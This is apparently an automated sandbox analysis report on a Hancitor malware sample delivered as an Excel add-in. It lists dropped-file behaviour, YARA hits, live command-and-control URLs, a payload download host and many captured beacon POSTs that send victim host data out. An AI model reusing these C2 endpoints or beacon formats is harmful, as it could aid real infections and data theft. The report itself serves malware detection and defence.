Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

16_2_0062B84D

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free,

16_2_00657096

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA,

16_2_00611A80

Remote Access Functionality:

Yara detected Hancitor

Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.21.173.155	elb097307-934924932.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
77.222.42.67	sudepallon.com	Russian Federation	44112	SWEB-ASRU	true
8.211.241.0	srand04rf.ru	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
elb097307-934924932.us-east-1.elb.amazonaws.com	23.21.173.155	true
srand04rf.ru	8.211.241.0	true
sudepallon.com	77.222.42.67	true
api.ipify.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false		high
http://thentabecon.ru/8/forum.php	true	Avira URL Cloud: safe	unknown
http://anspossthrly.ru/8/forum.php	true	Avira URL Cloud: safe	unknown
http://srand04rf.ru/08.jpg	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp

Malware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Multi AV Scanner detection for submitted file

Source: 0708_5355150121.xll	Virustotal: Detection: 23%			Perma Link
Source: 0708_5355150121.xll	ReversingLabs: Detection: 17%

Antivirus or Machine Learning detection for unpacked file

Source: 16.2.snd32sys.exe.610000.0.unpack

Avira: Label: TR/Dropper.Gen

Location Tracking:

Yara detected Hancitor

Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612CB0
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612CF7
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D78
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D58
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	16_2_00612D35

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\snd32sys.exe

Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack

Uses 32bit PE files

Source: 0708_5355150121.xll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source:

Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,		16_2_0065838E
Source: C:\Users\Public\snd32sys.exe	Code function: 16_2_00657FD2 FindFirstFileExW,		16_2_00657FD2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\mshta.exe

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor	URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor	URLs: http://thentabecon.ru/8/forum.php

Downloads files with wrong headers with respect to MIME Content-Type

Source: http

May check the online IP address of the machine

Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org
Source: C:\Users\Public\snd32sys.exe	DNS query: name: api.ipify.org

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.21.173.155 23.21.173.155
Source: Joe Sandbox View	IP Address: 77.222.42.67 77.222.42.67

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SWEB-ASRU SWEB-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
